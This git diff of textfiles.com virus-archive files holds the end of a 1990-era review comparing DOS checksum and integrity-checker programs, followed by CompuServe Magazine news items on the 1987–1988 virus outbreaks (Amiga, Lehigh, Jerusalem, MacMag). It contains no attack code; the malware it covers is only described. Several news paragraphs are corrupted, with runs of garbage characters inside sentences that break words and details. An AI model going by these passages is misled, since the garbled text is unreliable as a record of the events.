any of the programs in the F-Prot package becomes + infected with any virus, or changed in any way, it + reports "THIS PROGRAM HAS BEEN INFECTED!". If + any program is protected with F-XLOCK, it will then + hang the system. + + FICHECK + + You won't get a beep or message on the screen. A + report, sent to disk or your printer, lists the files that + have been added, deleted, or changed since the last run + of FICHECK. Changes noted can include size, date, + time, crc. If the report is not requested, or not + requested correctly, or sent to disk, users may not + become aware of virus-induced changes. + + Module Integrity Check + + You get several very nice reports, automatically placed + in your root, showing files removed, added, and + changed since the last run. If a file has been changed + for any reason, MIC will tell you, and will tell you to + read the change report. + + Novirus + + If Novirus does manage to find a problem with a + change in the time, date, size or presence of one of your + three system files, it will halt the system and display a + full-screen warning message. + + SSCRC + + You won't hear a beep. You might see a notice go past + on the screen when a changed file is found. At the end + of the scan, you'll see a summary table, including a row + showing number of files failing CRC. Their names are + listed at the top of REPORT.CRC, placed in the root. + Your batch file that invokes SSCRC could send this + report to the printer, if you wished. There is no system + lockup. We might want this less subtle. + + Validate + + Because Validate makes no comparison with + pre-recorded CRCs, it cannot know if there is a + problem with a file. It is happy to scan infected files + and report their CRCs. + + VCheck + + You won't hear a beep. You will see a list, on screen, of + exactly which COM and EXE files have different CRCs + or sizes. Their names can be listed in a report you + create, which can be sent to the printer. There is no + system lockup. + + VirusGuard + + No beeps. But you'll see the changed program listed on + the screen, with the message that it has been modified. + You'll need to tap a key to remove the message from + the screen. There is no system lockup, and no hard + copy report or file of changes is created. + + + + SELF-PROTECTION OF CHECKSUM PROGRAM + + + +If a checksum program becomes infected, it then puts the virus +into memory before it begins to run. A stealth virus in memory +is able to remove itself from any file as the file is checksummed, +preventing the checker from finding the virus. Thus we need +some notification that the checksum program has been infected. +Ideally, the checker reports that it has been infected and quits +running. + +To test this, we infected each checker with Jerusalem-B, and +tried running it. + + Alert + + Alert runs no worse with an infection than without one, + and never seems to notice that it has become a carrier + of Jerusalem. + + The Antibody Test + + As with Alert, Antibody runs just fine after infection. + + BSearch + + As with Alert and Antibody, BSearch runs just fine + with a Jerusalem infection. + + CHKSUM + + Runs well when infected. + + Checkup + + Runs as well when infected as when not infected -- + poorly. + + CRCDOS + + Runs well when infected. + + Delouse + + Runs well when infected. + + The Detective + + Runs well when infected. + + F-Prot + + F-OSCHK reports that it has been infected. F-XLOCK + reports that it has been infected, and hangs the + system. + + FICHECK + + Runs well when infected. Includes an option to + self-check for virus infection. The self-check works. + After a few moments, it will report "Error - This + program has been altered or tampered with!" However, + the user must invoke this option deliberately and + manually. + + Module Integrity Check + + Runs well when infected. + + Novirus + + Runs well when infected. + + SSCRC + + Runs well when infected. + + Validate + + Runs well when infected. + + VCheck + + Runs well when infected. + + VirusGuard + + Runs well when infected. + + + + VENDOR INFORMATION + + + + o Alert. Version 2.20, available from the NCSA BBS as + ALERT220.ZIP. Also available from Robert W. Reed, + 3858 Waterview Loop, Winter Park, FL 32792. Price: + $25 each for 1-10 licensees. + + o The Antibody Test, version 1.03B. Available from + the NCSA BBS as ANTIBODY.ZIP. Also available at + no charge from Commander, TRADOC, ATTN: ATIS-S + (Major Richard W. Adams), Ft. Monroe, VA + 23651-5000. + + o BSearch. "If you find BSearch of value, a contribution + of $10 would be helpful." Available from the NCSA + BBS as BSEARCH.ZIP, or from David Harris, POB + 2058, El Paso, TX 79951. + + o CHKSUM is available from the NCSA BBS in a file + called CHKSUM.ZIP. It is also available from its + author, Bob Taylor, 8602 Woodlake Drive, Richmond, + VA 23229. The author does not request a contribution. + The package includes C source code. + + o Checkup v. 3.9 (Levin) "This is not free software. + You are granted a limited license to evaluate this + program for ten days in your home or office. If you + continue to use this program, you must register with + the author. Registration fees are $24.95 per copy for + home users and $49.95 per copy for office users." + Available from the NCSA BBS as CHKUP39.ZIP or + from Richard B. Levin, POB 14546, Philadelphia, PA + 19115. + + o CRCDOS version 1.0. Available from the NCSA BBS + as CRCDOS.ZIP. This ZIP file includes C source + code. Written by R.E. Faith, January 11, 1988. + Released to the public domain, on condition that no fee + be charged for distribution, that authorship information + concerning source and any modifications will be + retained, and that the code is not included as part of a + commercial package. + + o Delouse version 0.9 Available from the NCSA BBS as + DELOUSE.ZIP. Written by Phillip M. Nickell, February + 28, 1988. Includes Pascal source code. No fee is + requested. No copyright is taken. Appears to be public + domain. Thanks, Mr. Nickell! + + o The Detective version 1.2 Available from the NCSA + BBS as DETECT.ZIP. "The free version of The + Detective is expressly prohibited for use in commercial, + educational, and governmental institutions except for + the purpose of evaluation." The price per computer, if + you choose to register, is $25 for 1-50 computers, and + less with more. You may order the current version from + PC Solutions, POB 742, Mequon, WI 53092. (414) + 241-9119. The shareware version, distributed via + bulletin boards, is unable to process files in the root + directory. + + o F-Prot, version 1.12, is available from the NCSA's BBS + as FPROT112.ZIP. Version 1.12 of this package + contains a large number of extremely useful anti-virus + tools. From the standpoint of the present review, only + two are relevant, however: F-XLOCK (which permits all + programs to check for CRC changes as they are + executed) and F-OSCHK (which checks the partition + table, boot record, two hidden system files, and + COMMAND.COM) F-Prot is available from Fridrik + Skulason, Box 7180, IS-127 Reykjavik, Iceland. Pricing: + Skulason suggests $15 for 1-7 computers, and lower + payments on larger volumes. + + o FICHECK, version 5.0, comes bundled with + MFICHECK 5.0 and PROVECRC ver 1.0. It may be + downloaded from the NCSA BBS as FICHECK5.ZIP. It + is available from the author, Chuck Gilmore, Gilmore + Systems, POB 3831, Beverly Hills, CA 90212-0831. + Pricing: "A 30 day trial period is granted. Afterward, + you may either order one of the commercial versions or + destroy the evaluation copies." Two commerical + versions are available: XFICHECK (eXtended + FICHECK) for $15 and PFICHECK (Professional + FICHECK) for $20. + + o Module Integrity Check, version 1.0, is available + from the NCSA BBS in a file called MIC10.ZIP. + Pricing: "This program may be used by anyone free of + charge... Anyone who finds this program of value is + encouraged to make a voluntary donation to the + author... Even if you do not make a donation you are + still free to use this program as you see fit." Author: + Steve Leonard, 260 Dunbar Road, Hilton, NY 14468. + + o Novirus version 3.0, accompanied by documentation + for version 2.0, is available in a file called + NOVIRUS3.ZIP on the NCSA BBS. It is also available + from the Interconnect BBS, 703-827-5762. Author: + Jeffrey Morley. Price: free. + + o SSCRC, version 1.4, is available in a file called + SSCRC.ZIP from the NCSA BBS. Pricing: "If you use + this utility to protect your system, do the right thing + and send us $10", says the author. It is available from + OSR, 561 Blaxland Road, Eastwood, 2122, NSW, + Australia. + + o Validate, version 0.3, is available in a file called + VALIDAT3.ZIP from the NCSA BBS. It is also + available at no charge from Computer Virus Industry + Association, 4423 Cheeney St., Santa Clara, CA 95054. + (408)-727-4559. Price: free. + + o VCheck, version 1.1E, is available in a file called + VCHECK.ZIP on the NCSA BBS. Pricing: "If you use + VCHECK, send a registration of $25 to + Systemberatung Axel Dunkel, Robert-Schuman-Ring + 37, D 6239 Kriftel, West Germany." + + o VirusGuard. + + + + SOME OBSERVATIONS + + + +Once again, the correlation between price and value is upset. +Many of our highest scoring packages were the cheapest. + +We note also the contradiction betwen our ratings and those +published elsewhere. The documentation accompanying Checkout +notes that the product is Compute!'s PC Magazine Editors choice +for virus protection, is the featured virus detection system in +Dvorak and Anis' "Dvorak's Guide to PC Telecommunications", +etc. We found it at the bottom of our scoring system. You may +wish to review our ratings of this product. + + + + OTHER EVALUATION CONSIDERATIONS + + + +We did not compare products on the following items, but you +may wish to: + + o Can the program work on files with hidden, system, + read-only attributes. + + o Can the program work from floppy disk? This is + valuable if you wish to use the program to monitor + another user's machine, for instance, to see if they are + clandestinely running a golf game that is not on the + approved corporate software list. It is also valuable for + guarding against stealth viruses. + + o Can the program produces separate lists of deleted + files, added files, and changed files? Separate lists may + have benefits over a massive list of changes. + + o Do you have control over whether the program updates + its baseline database? If the program updates this + everytime it is run, you will lose your history file. + + + + +++++ + + \ No newline at end of file diff --git a/textfiles.com/virus/csvir87.vir b/textfiles.com/virus/csvir87.vir new file mode 100644 index 00000000..8d7c430e --- /dev/null +++ b/textfiles.com/virus/csvir87.vir @@ -0,0 +1,90 @@ +The following text is copyright (c) 1987-1990 CompuServe Magazine +and may not be reproduced without the express written permission of CompuServe. + +CompuServe Magazine's Virus History Timeline + +CompuServe Magazine is published monthly by the CompuServe Information +Service, the world's largest on-line information service with over 600,000 +subscribers worldwide. + +If you would like to become a CompuServe subscriber, call +1-800-848-8199 to receive a copy of the CompuServe Information Service +membership kit. + +- 1987 - + + +"VIRUS" INFECTS COMMODORE COMPUTERS + + (Nov. 20) + A "virus" has been infecting Commodore's Amiga computers, and what was once +considered an innocent bit of hacking has turned into a disaster for some users. + The "virus" is a secret modification to the boot block, an area on many disks +using operating system facilities of the Amiga. In addition to its transparent +purpose --- starting the operating system -- the virus contains code that can +infect other disks. Once a virus infected disk is used on a computer, the +computer's memory becomes a breeding ground and all other bootable disks that +find their way to that computer will eventually become infected. Any exchange of +diskettes with another computer then infects the new computer. + Although the original intention of the virus apparently was benign, it may +have spread to thousands of Amiga computers and disrupted their normal +operations. Since some commercial software developers use coded information in +the boot block of their distribution disks, the virus can inadvertently damage +these disks and render the software useless. Knowledgeable users say the virus +was meant to be a high-tech joke that displayed a message after it had +completely infiltrated a user's disks library. + According to Amiga technical support personnel, the only sure way for users to +keep the virus out of their systems is to avoid warm starting the computer. It +should always be 'wered down first. + --James Moran + + +VIRUS MOVES TO IBM COMPUTERS + + (Dec. 7) + On the heels of the Amiga virus, reported recently in Online Today, a new +apparently less benign virus has been making the rounds of IBM personal +computers. The IBM-related virus was first noted at Lehigh University where, +last week, a representative in the User Services section reported its discovery +by student consultants. + As with other similar viruses, this one is spread by means of an infected +system file. In this case, a hacked version of IBM's COMMAND.COM processor is +the host that harbors the virus. Once infected, the host PC will then infect +the first four computers with which it comes in contact. In all cases, the virus +is spread through an illegally modified version of the IBM command processor. + Once the host has infected four other computers, the host virus is reported to +purposely destroy the boot tracks and allocation tables for all disks and +diskettes that are online to the host computer. The action renders the disks +completely unreadable, even when reconstructs are attempted with popular disk +repair software. + The consultant at Lehigh University who first alerted general users to the +virus says that it can be detected by examining the date on the COMMAND.COM +file. A recent date would suggest that the file had been illegally modified. + --James Moran + + +CHRISTMAS GREETINGS MESSAGE TIES UP IBM'S ELECTRONIC MAIL SYSTEM + + (Dec. 12) + IBM nearly lost its Christmas spirit yesterday. It seems that a digital +Christmas card sent through its electronic mail system jammed computers at +plants across the United States for up to 90 minutes. + The Associated Press quotes IBM spokesman Joseph Dahm as saying the incident +caused no permanent damage, but forced the company to turn off links between +computer terminals for a while. + AP says, "Curious employees who read the message discovered an illustration of +a Christmas tree with 'Holiday Greetings' superimposed on it. A caption advised, +'Don't browse it, it's more fun to run it.' Once a person opened the computer +message on their screen, it rarely accepted a command to stop the message from +unfolding on the screen. As a result, several people shut off their computers +and lost reports or mail that had not previously been filed." + Apparently the message also automatically duplicated itself and was sent to +other workstations. + Online plants in Texas and New York were affected, Dahm said. Meanwhile, +sources said that other facilities in Charlotte, N.C.; Lexington, Ky.; +California and Europe also received the message. + Federal agents even may investigate the incident, the wire service says, since +the message apparently crossed state lines. + --Charles Bowen + + \ No newline at end of file diff --git a/textfiles.com/virus/csvir88.vir b/textfiles.com/virus/csvir88.vir new file mode 100644 index 00000000..4e068e44 --- /dev/null +++ b/textfiles.com/virus/csvir88.vir @@ -0,0 +1,1758 @@ +The following text is copyright (c) 1987-1990 CompuServe Magazine +and may not be reproduced without the express written permission of CompuServe. + +CompuServe Magazine's Virus History Timeline + +CompuServe Magazine is published monthly by the CompuServe Information +Service, the world's largest on-line information service with over 600,000 +subscribers worldwide. + +If you would like to become a CompuServe subscriber, call +1-800-848-8199 to receive a copy of the CompuServe Information Service +membership kit. + + +- 1988 - + + +COMPUTER VIRUS THREATENS HEBREW UNIVERSITY'S EXTENSIVE SYSTEM + + (Jan. 8) + In Jerusalem, Hebrew University computer specialists are fighting a deadline +to conquer a digital "virus" that threatens to wipe out the university's system +on the first Friday the 13th of the year. That would be May 13. + Associated Press writer Dan Izenberg says the experts are working on a +two-step "immune" and "unvirus" program that could knock down the vandalized +area of the system. + "Viruses" are the latest in computer vandalism, carrying trojan horses and +logic bombs to a new level, because the destructiveness is passed from one +infected system to another. Izenberg quotes senior university programmer Yisrael +Radai as saying that other institutions and individual computers in Israel +already have been contaminated. + "In fact," writes the wire service, "anyone using a contaminated computer disk +in an IBM or IBM-compatible computer was a potential victim." + Radai says the virus was devised and introduced several months ago by "an +evidently mentally ill person who wanted to wield power over others and didn't +care how he did it." + AP describes the situation this way: + "The saboteur inserted the virus into the computer's memory and the computer +then infected all disk files exposed to it. Those disk files then contaminated +healthy computers and disks in an electronic version of a contagious cold." + Apparently, the intruder wanted to wipe out the files by Friday, May 13, ΁+haW:ѕimpatient, because +he then had his virus order contaminated +programs to slow down on Fridays and on the 13th day of each month. + Radai thinks that was the culprit's first mistake, because it allowed +researchers to notice the pattern and set about finding the reason why. + "Another clue," says AP, "was derived from a flaw in the virus itself. Instead +of infecting each program or data file once, the m!l`gnant orders copied +themselves over and over, consuming increasing amounts of memory space. Last +week, experts found the virus and developed an antidote to diagnose and treat +it." + Of viruses in general, computer expert Shai Bushinsky told AP, "It might do to +computers what AIDS has done to sex. The current free flow of information will +stop. Everyone will be very careful who they come into contact with and with +whom they share their information." + --Charles Bowen + + +TAMPA COMPUTERISTS FIGHT VIRUS + + (Jan. 10) + Tampa, Fla., computerists say they are fighting a digital "virus" that sounds +as if it may be th}ame`ɽɅr݁ե +ٕͥJRale[H +́reported earlier, Hebrew University computer specialists are contending +with a virus program that threatens to wipe out the university's system on the +first Friday the 13th of the year -- May 13. The Jerusalem team is working on a +two-step "immune" and "unvirus" program that could knock down the vandalized +area of the system. + Meanwhile, members of the Tampa Amiga User's Group now tell United Press +International that they, too, are fighting a computer virus, and UPI quotes one +expert as saying a version of that vandalizing program also is designed to begin +destroying files on May 13. + Computer viruses are self-propagating programs that spread from one machine to +another and from one disk to another, a sort of new generation of more +destructive trojan horses and logic bombs. + "It kinda creeps up on you," president Jeff White of the Amiga group told the +wire service, adding that the group's membership was infiltrated by the program. + UPI reports, "Experts don't yet know what, if any, damage the virus can cause +to the disks or programs. Similar problems have erased programs and information. +... White said the program spread itself to more than 20 of his floppy disks +before he discovered it. But by then, the program had spread to the disks of +many of the club's members via its regular disk-of-the-month distribution." + White said he doesn't know how the bug got to Tampa, but suspects it came from +West Germany on a disk from an overseas user group. + "White said the program works invisibly," says UPI. "When the computer is +turned on, the program stores itself in the machine's main memory and then +begins spreading copies of itself to new disks used in the machine." + He added that the Tampa club members now use a "virus-checker" program to test +disks to prevent another infection. + --Charles Bowen + + +VIRUS PROGRAMS COULD HAVE USEFUL APPLICATIONS, SAYS COLUMNIST + + (Jan. 11) + Despite all the recent negative publicity about computer "viruses" -- +self-propagating programs that spread from one machine to another in way that +has been called the computer version of AIDS -- a California computer columnist +says there could be a positive result. + Writing in The San Francisco Examiner, John Markoff observes, "In the future, +distributed computing systems harnessed by software programs that break tasks +into smaller parts and then run portions simultaneously on multiple machines +will be commonplace. In the mid-1970s computer researchers John Shoch and Jon +Hupp at Xerox's Palo Alto Research Center wrote experimental virus programs +designed to harness many computers together to work on a single task." + Markoff points out that some of the programs in that work functioned as "'town +criers' carrying messages through the Xerox networks; others were diagnostic +programs that continuously monitored the health of the computers in the +networks." + Also the researchers called one of their programs a "vampire worm" because it +hid in the network and came out only at night to take advantage of free +computers. In the morning, it disappeared again, freeing the machines for human +users. + For now, nonetheless, most viruses -- particularly in the personal computing +world -- are viewed as destructive higher forms of trojan horses and logic +bombs. + Markoff traces the first virus to the military ARPAnet in 1970. On that +system, which links the university, military and corporate computers, someone +let loose a program called "creeper." + Notes the paper, "It crawled through the network, springing up on computer +terminals with the message, 'I'm the creeper, catch me if you can!' In response, +another programmer wrote a second virus, called 'reaper' which also jumped +through the network detecting and 'killing' creepers." + Markoff also pointed out that Bell Labs scientist Ken Thompson, winner of the +prestigious Turing Award, recently discussed how he created a virus in the lab +to imbed in AT&T's Unix operating system, which he and colleague Dennis Ritchie +designed. + In a paper, Thompson noted how he had embedded a hidden "trapdoor" in the Unix +log-on module each time it created a new version of the operating system. The +trapdoor altered the log-on mechanism so that Unix would recognize a password +own only to Thompson. + Thompson and Ritchie say the Unix virus never escaped Bell Labs. + --Charles Bowen + + +SUBSCRIBER, SYSOP BLOCK POSSIBLE "VIRUS" IN APPLE HYPERCARD FORUM + + (Feb. 8) + Quick reactions by a subscriber and a veteran forum administrator have blocked +a possible computer "virus" program that was uploaded over the weekend to +CompuServe's new Hypercard Forum. + The suspicious entry was an Apple Hypercard "stack" file called "NEWAPP.STK," +which was uploaded Friday to the forum's Data Library 9, "HyperMagazines." It +was online for about 24 hours before it was caught. + Subscriber Glenn McPherson was the first to blow the whistle. Saturday night +McPherson posted a message saying that when he ran the application, the file +altered his Macintosh's systems file. "I don't know why it did this," he wrote, +"but no stack should touch my system file." + Neil Shapiro, chief forum administrator of the Micronetworked Apple Users +Group (MAUG), quickly investigated and removed the suspicious file. + In a bulletin to the membership, Shapiro warned those who already had +downloaded NEWAPP.STK that the stack would alter the system files with unknown +results. He also warned against using system files from any disk that was run +while the NEWAPP.STK's modified system was in effect. + Said Shapiro, "If you run NEWAPP.STK, it will modify the system on the disk it +is on so that the system's INITs contain an INIT labeled 'DR.' Then, if you use +another system with the DR-infected system as your boot system, the new system +will also contain the self-propagating 'DR' INIT Resource. While it is possible +to, apparently, 'cut' this resource from infected systems with the Resource +Editor, the only sure course of action is to trash any system file that has come +in contact with this stack." + It was not immediately known if the system alternations were deliberately or +accidentally programmed into NEWAPP.STK. Shapiro notes the file's uploader has +been locked off the entire system and that "he will be contacted by CompuServe +and/or myself." + Computer "viruses" -- self- propagating programs that infect system files and +then spread to other disks -- have been in the news for the past six months. To- +date, most of their targets have been regional computer users groups, private +and semi-public networks and stand-along bulletin board systems. This apparently +is the first report of a virus-like program on a national consumer information +service. + Shapiro says in his bulletin that in eight years of the various Apple forums' +operation, this is the only such occurrence. + "While I, of course, cannot say it will be the last, I still have just as much +confidence as always in the fact that 99.99999999% of the Mac community are +quite trustworthy and that there is no real need to fear downloads," he wrote. + Shapiro also urged his membership, "If you have not used (NEWAPP.STK) yet, do +not! If you have uploaded it to other BBS or network systems, please immediately +advise the sysops there of the problem. If you have placed it on a club disk, +please be certain to remove it from that disk before distribution and -- if it +has been run from the 'Master' disk already -- don't just remove it, but trash +the system." + Subscriber McPherson indicates the suspect file already has spread to other +systems. His forum note says he found the same stack program also in a software +library on the General Electric's GEnie network. + --Charles Bowen + + + +DOD TRIES TO PROTECT ITS COMPUTERS FROM ELECTRONIC VIRU + (Feb. 9) + Just as a medical virus can spread rapidly, so does the deadly computer virus +seem to be making the rounds. + In an effort to inoculate itself against an outbreak, the Department of +Defense has taken steps to prevent the electronic sabotage from affecting its +computers, reports Government Computer News. + The computer viruses are self- propagating programs that are designed to +spread automatically from one computer to another and from one disk to another, +totally disrupting normal operations. + As reported in Online Today, such viruses have already struck computer systems +at Hebrew University in Jerusalem and IBM Corp.'s regional offices in Tampa, +Fla. + "It can spread through computer networks in the same way it spreads through +computers," said DOD spokeswoman Sherry Hanson. "The major problem areas are +denial of service and compromising data integrity." In addition to basic +security measures, computer scientists at the National Security Agency are +installing programming tools and hardware devices to prevent the infiltration of +virus programs. Hanson told GCN that DOD is also using specialized ROM devices +and intrusion detectors. The virus only comprises a few lines of programming +code and is easy to develop with few traces. + After IBM was infiltrated last December with an innocent- looking Christmas +message that kept duplicating itself many times over and substantially slowed +the company's massive message system, specialists installed a filter program to +monitor the system and protect against further intrusion. + According to GCN, executable programs can't be traj3erred from one computer +to another within IBM's networi + YͽѕɁ͕́ +ɕɥ́́BJ +5Rcomute.jumemory. For instance, almost the entire membership of a Florida +Commodore Amiga users group was infected by a virus before it was discovered. + The president of the group said he believed the virus originated in Europe on +a disk of programs the group received from an overseas source. The club now has +a checker program to check disks for viruses before they are used. + Al Gengler, a member of the Amiga group, compared the virus to AIDS. "You've +got to watch who you compute with now," he said. + --Cathryn Conroy + + +EXPERTS SEES TWO SCENARIOS FOR THE COMPUTER "VIRUS" PROBLEM + + (Feb. 9) + Don Parker, who heads the information security program for the Menlo Park, +Calif., SRI International, has been studying the problem of computer "viruses" +and now says he see two possible directions in the future. + Speaking with Pamela Nakaso of the Reuter Financial News Service, Parker said +his scenarios are: + -:- One, that viruses will be too difficult to design and use for +infiltration, and that interest in using them as "weapons" will die away. + -:- Or, two, viruses will increase in destructiveness as more sophisticated +saboteurs use them to destroy the public domain software resources available. + Nakaso also quotes editor Harold Highland of the magazine Computers and +Security as saying that "hysteria" over the few documented incidents may fuel +even more viruses, which are defined as self-propagating files that usually +damage a computer's systems files and then spread to other disks. + Highland pointed out that in a recent Australian virus case among Amiga +computers, one tabloid newspaper reported the incident with a headline that +sp`ned the entire cover, reading, "Terror Strikes in the DP Industry." + Parker told Reuter, "The vulner`ility is growing at the same rate as the +number of computers and number of communications with computers." + Nakaso writes, "Parker estimates that of the 2,000 cases of documented +computer crime he has compiled at SRI, about 20 to 30 have been virus attacks. +There is no question, however, the reported incidents are rising, and they are +expanding beyond personal computers to mainframes and other networks." + --Charles Bowen + + + +COMPUTER VIRUS CALLED FRAUD + + (Feb. 10) + Comp}dr viruses may be frauds. Although lots of people are talking about +computerdoms latest illicit fad, to date, no one has produced a copy of a living +breathing virus. Now, a University of Utah expert on urban legends thinks that +the dreaded virus may be have become the high tech version of the bogey man. + Professor Jan Harold Brunvand has written three books about urban legends and +he seems to think that the virus is just the latest incarnation in a long line +of legends. Brunvand, and others, have pointed out that there are striking +similarאV +=r˸Ḱof the virus and legends such as the cat in the +microwave oven. For one thing, there are lots of reported sightings but no +concrete evidence. And urban legends always seem to appear and affect those +things about which urban dwellers are just coming to terms with: shopping malls +and microwave ovens in the 70's, computers in the 80's. + In doayg +͕ɭѕɁс"ɽ́J́zݹɝ"х5Rcrtaily qualifies as the stuff about which legends are made. +Even the way in +which the deed is accompli.HY6́mystical qualities: a computer wizard works +strange magic with the secret programming codes of a computer operating system. + Brunvand, a computer owner himself, says that although viruses could be +created, he has found absolutely no evidence to support claims about their +existence. + --James Moran + + + +HYPERCARD VIRUS JUDGED "HARMLESS" + + (Feb. 12) + Administrators of a CompuServe forum supporting the Apple Hypercard technology +have confirmed that a file uploaded to their data libraries last weekend did +indeed contain a so-called computer "virus." + However, they also have determined the program apparently was harmless, meant +only to display a surprise message from a Canadian computer magazine called +MacMag. + As reported earlier this week, forum administrator Neil Shapiro of the +Micronetworked Apple Users Groups (MAUG) removed the suspicious entry, a +Hypercard "stack" file called "NEWAPP.STK," after a forum member reported that +the file apparently altered his Macintosh's system files. + Computer "viruses," a hot topic in the general press these days, have been +defined as self-propagating programs that alter system files and then spread +themselves to other disks. + Since removing the file last weekend, the Apple administrators have been +examining the file and now Shapiro says it apparently was designed merely to +display a message from MacMag on March 2. + On the HyperForum message board G2APPHYPER), Shapiro reports, "Billy +Steinberg was able to reverse engineer (disassemble) the INIT that the virus +places into system files. The good news is that the virus is harmless. But it +*is* a computer virus." + Shapiro says that if the downloaded file remained in the user's system, then +on March 2, the screen would display: + "Richard Brandnow, publisher of MacMag, and its entire staff would like to +take this opportunity to convey their universal message of peace to all +Macintosh users around the world." + Apparently the file is so designed that after March 2 it removes itself from +the 떮.em\ + Shapiro notes that, while this file apparently is harmless, it still raises +the question of the propriety of database entries that quietly alter a user's +system files. + Shapiro said he has spoken to publisher Brandnow. "It was not his intention to +place it in a HyperCard stack nor to have it on (CompuServe)," Shapiro writes. +"What he did do was to develop the INIT in December and 'left' it on their +(MacMag's) own machines with the hope that 'it would spread.'" + Subsequently, someone else apparently captured the file, added it to his +"stack" and uploaded to the CompuServe forum and other information services. + While Brandnow maintains the system-altering INIT file was harmless, Shapiro +says he's concerned about what the NEWAPP.STK incident could represent. + "While the INIT itself is non-destructive," Shapiro wrote, "I believe it was +at least irresponsible for MacMag to have perpetrated this type of problem and +to have caused the confusion that they did. I also fear that this could give +other people ideas on less peaceful uses of such a virus. + "I belede that MacMag has opened here a Pandora's Box of problems which will +haunt our community for years. I hope I am wrong." + --Charles Bowen + + +PUBLISHER DEFENDS HIS "VIRUS" PROGRAM AS "GOOD FOR COMMUNITY" + + (Feb. 13) + The publisher of Canadian computer magazine MacMag contends the computer +"virus" program his staff initiated recently was not only harmless but was "good +for the Macintosh community." + Says 24-year-old Richard Brandow, "If other people do nasty things (with virus +programs), it is their responsibility. You can't blame Einstein for Hiroshima." + Speaking by phone with reporter Don Clark of The San Francisco Chronicle, +Brandow maintained his magazine's virus program, which spread through the Apple +Macintosh community this week on this continent and apparently reached Europe, +was intended to do nothing more than display a "peaceful" message on Mac screens +on March 2, the first anniversary of the introduction of the Apple Mac II. + Of the so-called "virus" technology, Brandow said, "This message is very good +for the Macintosh community." + The controversy centered around an Apple Hypercard "stack" file called +"NEWAPP.STK" that was uploaded to various public domain databases around the +country, including the data library of CompuServe's HyperForum (G APPHYPER). + When subscribers discovered that the file quietly altered their Mac's system +files when it was executed, a warning was posted and forum administrator Neil +Shapiro immediately removed the data library entry. Only after the forum's +sysops had disassembled the suspect file could it be determined that +NEWAPP.STK's only apparent function was to display a March 2 greeting from +Brandow and the MacMag staff. + HyperForum members now have been informed that the file, while indeed a +"virus," apparently is harmless. However, Shapiro contends MacMag staffers were +"at least irresponsible ... to have perpetrated this type of problem and to have +caused the confusion that they did." + Shapiro is quoted in The Chronicle as adding, "This is very similar to someone +breaking into your home and writing a message of good will in red lipstick on +your wall. It is a violation of the right of private property... Our computers +are machines that belong to us and other people should remain out of them." + On the other side of the argument, Brandow told the paper, "The idea behind +all this is to promote peaceful methods of communication between individuals +using harmless ways." + Montreal-based MacMag, with a circulation of 40,000, is Canada's only +Macintosh magazine. Brandow also heads a 1,250-member Mac user group, which he +says is Canada's largest. + Brandow told Clark that programmers worked more than a year on the virus, +adding that it was inspired by two groups, known as "The Neoists" and "The +Church of!he SubGenius." (He said the latter was formed in Texas as a satire on +fundamentalist religion and inspired a 1983 book.) + As noted here earlier, the MacMag virus also reached beyond CompuServe to +other information services and private bulletin board systems. For instance, The +Chronicle quotes General Manager Bill Louden of General Electric's GEnie as +saying that about 200 users downloaded the file from that information service +before it was discovered and removed early Monday. Meanwhile, Shapiro told Clark +that only about 40 of CompuServe's subscribers retrieved the file before it was +removed early Sunday. + The Chronicle says that Mac devotees in the Bay Area were "stunned" by news of +the virus, but not all were upset. For example, Apple wizard Andy Hertzfeld, a +co-designer of the original Mac, told the paper, "As far as I'm concerned, it +doesn't have any malicious intent and is just some people having fun. I don't +see why people are so uptight." + Meanwhile, a spokeswoman for Apple at company headquarters in Cupertino, +Calif., said the company is searching for details of the virus and could not +comment on it at present. + --Charles Bowen + + + +TWO FIRMS OFFER TO "INOCULATE" US AGAINST THE COMPUTER "VIRUSES" + + (March 4) + The debate continues over whether computer "viruses" are real or just the +latest urban legend, but at least two companies are hoping that we don't want to +take any changes. + Independent of each other, the firms this week both claimed to have the first +commercial software to "inoculate" systems against those reported rogue programs +that damage data and systems files. + One of the companies, Lasertrieve Inc. of Metuchen, N.J., introduced its +VirALARM product during Microsoft Corp.'s CD-ROM conference in Seattle. + In addition, in Stockholm, a Swedish company called Secure Transmission AB +(Sectra) today announced a similar anti-virus program called TCELL, after a +counterpart in human biology. + A Lasertrieve statement contends that previous anti-viral software utilities +-- mostly offered in the public domain -- work by drawing attention to the +virus's attempted alterations of system files, noting a change of file size, or +monitoring the dates of program changes. However, the New Jersey firm contends, +this approach makes such programs "easily fooled by sophisticated viruses." + Lasertrieve says its VirALARM contains a program designed to protect another +program, creating a software "barrier." According to the statement, before +anyone can use the protected program, VirALARM checks to determine whether the +program has been altered since it was inoculated. If there has been any change, +the software then blocks use of the altered program, notifies the user and +suggests a backup copy of the program be substituted. + Meanwhile, Bo-Goran Arfwidsson, marketing director of the Swedish company, +told Bengt Ljung of United Press International that its TCELL "vaccine" gives a +database a partial outside protection, sounds an alarm if a computer virus +appears inside a database and identifies the infected file so it can be +isolated. The contaminated part then can be replaced with a backup file. + Sectra spokesman Torben Kronander said that TCELL has been "tested for a year +now and ther% `s no question that it works," adding that since early 1987 the +software has functioned on computers of major Swedish manufacturing companies. +Arfwidsson declined to name those companies for security purposes. + Kronander said TCELL simply made the task of creating a virus so complicated +that only vast computer systems would be able to carry it out. "We've +effectively removed the hacker type of attack, and these have been the problem. +It will take the resources of a major software producer or a country to produce +a virus in the future." + UPI says Sectra is a 10-year-old research company with 19 employees in +Linkoping in central Sweden, closely tied to the city's Institute of Technology. + --Charles Bowen + + + +"VIRUS" SPREADS TO COMMERCIAL PROGRAM; LEGAL ACTION CONSIDERED + + (March 16) + That so-called "benign virus" that stirred the Apple Macintosh community +earlier this year when it cropped up in a public domain file in forums on +CompuServe and other information services now apparently has invaded a +commercial program called FreeHand. + The publisher, Seattle's Aldus Corp., says it had to recall or rework some +5,000 FreeHand packages once the virus was discovered and now is considering +legal action against those who admitted writing the self- propagating program. + Meanwhile, other major software companies reportedly are worried that the +virus may have affected some of their products as well. + At the heart of the controversy is a "peace message" that Canadian Richard +Brandow, publisher of Montreal's MacMag magazine, acknowledged writing. As +reported here earlier, that file was designed to simply pop up on Mac screens7round the world on March 2 to +celebrate the first anniversary of the release of +the Macintosh II. However, many Mac users reacted angrily when they learned that +the file quietly had altered their systems files in order to make the surprise +message possible. + Now the virus has re-emerged, this time in FreeHand, a new Mac program Aldus +developed. Aldus spokeswoman Laury Bryant told Associated Press writer George +Tibbits that Brandow's message flashed when the program was loaded in the +computer. + Bryant added that, while it "was a very benign incident," Aldus officials are +angry and "are talking with our attorneys to understand what our legal rights +are in this instance.... We feel that Richard Brandow's actions deserve to be +condemned by every member of the Macintosh community." + This may be the first 